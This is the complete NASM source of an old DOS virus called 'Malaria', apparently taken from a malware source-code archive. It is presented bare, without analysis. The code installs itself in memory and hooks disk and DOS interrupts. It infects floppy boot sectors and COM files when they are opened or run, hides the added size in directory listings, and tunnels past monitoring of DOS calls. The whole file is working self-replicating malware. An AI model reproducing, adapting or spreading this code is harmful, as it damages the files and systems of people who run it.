MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.malaria.asm

409 lines
11 KiB
NASM
Raw Permalink Normal View History

2021-01-12 23:49:21 +00:00
;
;=============================================================================
; [Malaria]
; TSR, parasitic, tunneling, sub-stealth, floppy, COM infecting virus
;=============================================================================
;
virus_size equ (v_end-v_start)
loader_size equ (loader_end-loader_start)
paragraph_size equ (heap_end-v_start+010Fh)/0010h+0001h
.model tiny
.code
.286
org 0100h
start:
v_start:
push ds es
dec ax
int 0013h
inc ax
jz exit_install
mov ax,es
dec ax
mov ds,ax
mov bx,5A4Dh
sub si,si
cmp bl,byte ptr [si]
jz exit_install
mov ax,offset exit_install
delta_two = $-0002h
push cs ax
sub word ptr [si+0003h],paragraph_size
sub word ptr [si+0012h],paragraph_size
mov byte ptr [si],bl
mov ax,word ptr [si+0012h]
mov ds,ax
mov byte ptr [si],bh
mov word ptr [si+0001h],0008h
mov word ptr [si+0003h],paragraph_size-0001h
inc ax
mov es,ax
push ax
mov si,offset v_start
delta_one = $-0002h
mov cx,virus_size
mov di,offset v_start
rep movs byte ptr [di],cs:[si]
mov ax,offset trace_interrupt
push ax
retf
exit_install:
pop es ds
mov si,offset host_bytes
delta_three = $-0002h
mov di,offset v_start
push di
movsb
movsw
retn
loader_start:
mov ax,0B900h
mov es,ax
push ax
mov ax,offset restore_boot_sector
push ax
mov ax,0202h
mov bx,offset v_start
mov cx,'ML'
loader_fix_1 = $-0002h
inc dh
int 0013h
retf
loader_end:
restore_boot_sector:
xor ax,ax
mov es,ax
mov si,offset boot_bytes
mov di,7C00h
push ax di
mov cl,loader_size shr 0001h
rep movs word ptr [di],cs:[si]
mov ax,word ptr es:[0084h]
mov word ptr cs:[int_word],ax
push cs
pop es
mov byte ptr cs:[trace_interrupt_],00C3h
call trace_interrupt
mov byte ptr cs:[trace_interrupt_],00BEh
retf
trace_interrupt:
mov ds,cx
mov byte ptr cs:[trap_flag],cl
mov si,004Ch
mov di,offset i0013hOffset
movsw
movsw
mov word ptr [si-0004h],offset i0013h
mov word ptr [si-0002h],cs
trace_interrupt_:
mov si,0084h
mov di,offset i0021hOffset
movsw
movsw
mov word ptr [si-0004h],offset i0021h
mov word ptr [si-0002h],cs
mov si,0004h
push word ptr ds:[si] word ptr ds:[si+0002h]
mov word ptr [si],offset i0001h
mov word ptr [si+0002h],cs
mov ah,0052h
int 0021h
mov word ptr cs:[dos_segment],es
mov ah,0001h
push ax
popf
mov ah,0019h
call call_i0021h
pop word ptr ds:[si+0002h] word ptr ds:[si]
retf
i0001h: push bp
mov bp,sp
push ax
cmp byte ptr cs:[trap_flag],0001h
jz i0001h_exit_
mov ax,word ptr [bp+0004h]
cmp ax,0D00Dh
dos_segment = $-0002h
jnz i0001h_exit
mov word ptr cs:[t0021hSegment],ax
mov ax,word ptr [bp+0002h]
mov word ptr cs:[t0021hOffset],ax
inc byte ptr cs:[trap_flag]
i0001h_exit_:
and byte ptr [bp+0007h],-0002h
i0001h_exit:
pop ax bp
int_return:
iret
i0013h: cmp ax,-0001h
jz int_return
cmp byte ptr cs:[trap_flag],0001h
jz i0013h_continue
pusha
push ds es cs
pop es
cwd
mov ds,dx
mov ax,word ptr ds:[0084h]
cmp ax,word ptr cs:[int_word]
jz hook_exit
push cs
call trace_interrupt_
hook_exit:
pop es ds
popa
i0013h_continue:
cmp dl,0001h
jnb original_i0013h
cmp ah,0002h
jz i0013h_stealth_boot
pusha
push ds es
cmp ah,0003h
jnz i0013h_exit
i0013h_infect_boot:
mov ax,0BBE8h
mov es,ax
mov ax,0201h
xor bx,bx
mov cx,0001h
xor dh,dh
call call_i0013h
cmp byte ptr es:[bx],00B8h
jz i0013h_exit
mov al,byte ptr es:[bx+0010h]
mul byte ptr es:[bx+0016h]
xchg ax,cx
mov ax,word ptr es:[bx+0011h]
shr ax,0004h
add ax,cx
sub ax,word ptr es:[bx+0018h]
mov word ptr cs:[loader_fix_1],ax
push ax es es cs
pop es ds
mov cl,loader_size shr 0001h
xor si,si
mov di,offset boot_bytes
rep movsw
pop es
mov cl,loader_size shr 0001h
mov si,offset loader_start
sub di,di
rep movs word ptr [di],cs:[si]
mov ax,0301h
inc cx
call call_i0013h
push cs
pop es
mov ax,0302h
mov bx,offset v_start
pop cx
inc dh
call call_i0013h
i0013h_exit:
pop es ds
popa
original_i0013h:
db 00EAh,'PURE'
i0013hOffset = $-0004h
i0013hSegment = $-0002h
i0013h_stealth_boot:
cmp cx,0001h
jnz original_i0013h
or dh,dh
jnz original_i0013h
pusha
call call_i0013h
jc i0013h_stealth_boot_exit
cmp byte ptr es:[bx],00B8h
jnz i0013h_stealth_boot_exit
mov si,offset boot_bytes
mov di,bx
mov cl,loader_size shr 0001h
rep movs word ptr [di],cs:[si]
i0013h_stealth_boot_exit:
popa
clc
retf 0002h
i0021h: cmp ah,0011h
jz fcb_stealth
cmp ah,0012h
jz fcb_stealth
cmp ah,004Eh
jz dta_stealth
cmp ah,004Fh
jz dta_stealth
pusha
push ds es
cmp ax,4300h
jz i0021h_infect_file
cmp ax,4301h
jz i0021h_infect_file
cmp ax,4B00h
jz i0021h_infect_file
i0021h_exit:
pop es ds
popa
original_i0021h:
db 00EAh,'TEXT'
i0021hOffset = $-0004h
i0021hSegment = $-0002h
fcb_stealth:
call call_i0021h
pusha
push es
inc al
jz fcb_exit_
mov ah,002Fh
call tunnel_i0021h
cmp byte ptr es:[bx],-0001h
jnz fcb_continue
add bx,0007h
fcb_continue:
mov ax,word ptr es:[bx+0017h]
mov cx,word ptr es:[bx+0019h]
call hide_dir
fcb_exit_:
pop es
popa
fcb_exit:
iret
dta_stealth:
call call_i0021h
jc dta_exit
pusha
push es
mov ah,002Fh
call tunnel_i0021h
mov ax,word ptr es:[bx+0016h]
mov cx,word ptr es:[bx+0018h]
sub bx,0003h
call hide_dir
pop es
popa
dta_exit:
retf 0002h
_close_file:
jmp close_file
i0021h_infect_file:
push ds
pop es
mov al,002Eh
mov cx,0040h
mov di,dx
repnz scasb
cmp word ptr [di],4F43h
jnz i0021h_exit
mov ax,3D02h
call tunnel_i0021h
xchg ax,bx
mov ax,1220h
int 002Fh
push bx
mov ax,1216h
mov bl,byte ptr es:[di]
int 002Fh
pop bx
mov si,offset temp_buffer
push cs
pop ds
mov ah,003Fh
mov cl,0003h
mov dx,si
call tunnel_i0021h
cmp word ptr [si],5A4Dh
jz close_file
cmp word ptr [si],4D5Ah
jz close_file
push si
lodsb
mov byte ptr [si-0004h],al
lodsw
mov word ptr [si-0005h],ax
pop si
mov ax,word ptr es:[di+0011h]
mov word ptr es:[di+0015h],ax
mov cx,virus_size
cmp ax,cx
jb close_file
push ax
sub ax,0003h
mov byte ptr [si],00E9h
mov word ptr [si+0001h],ax
sub ax,cx
cmp ax,word ptr [si-0002h]
pop ax
jz close_file
add ax,offset v_start
mov word ptr [delta_one],ax
add ax,offset exit_install-v_start
mov word ptr [delta_two],ax
add ax,offset host_bytes-exit_install
mov word ptr [delta_three],ax
mov ah,0040h
mov dx,offset v_start
call tunnel_i0021h
mov word ptr es:[di+0015h],0000h
mov ah,0040h
mov cx,0003h
mov dx,si
call tunnel_i0021h
mov ax,5701h
mov cx,word ptr es:[di+000Dh]
mov dx,word ptr es:[di+000Fh]
push dx
and cx,-0020h
and dx,001Fh
dec dx
or cx,dx
pop dx
call tunnel_i0021h
close_file:
mov ah,003Eh
call tunnel_i0021h
jmp i0021h_exit
hide_dir:
mov si,001Fh
and ax,si
and cx,si
dec cx
xor ax,cx
jnz hide_exit
cmp ax,word ptr es:[bx+si]
ja hide_exit
mov ax,virus_size
cmp word ptr es:[bx+si-0002h],ax
jbe hide_exit
hide_continue:
sub word ptr es:[bx+si-0002h],ax
hide_exit:
retn
tunnel_i0021h:
pushf
db 009Ah,'PURE'
t0021hOffset = $-0004h
t0021hSegment = $-0002h
retn
call_i0013h:
pushf
push cs
call original_i0013h
retn
call_i0021h:
pushf
push cs
call original_i0021h
retn
boot_bytes db loader_size dup (0000h)
host_bytes db 00CDh,0020h,'!'
v_end:
heap_start:
temp_buffer db 0003h dup (?)
trap_flag db 0001h dup (?)
int_word db 0002h dup (?)
heap_end:
end start
.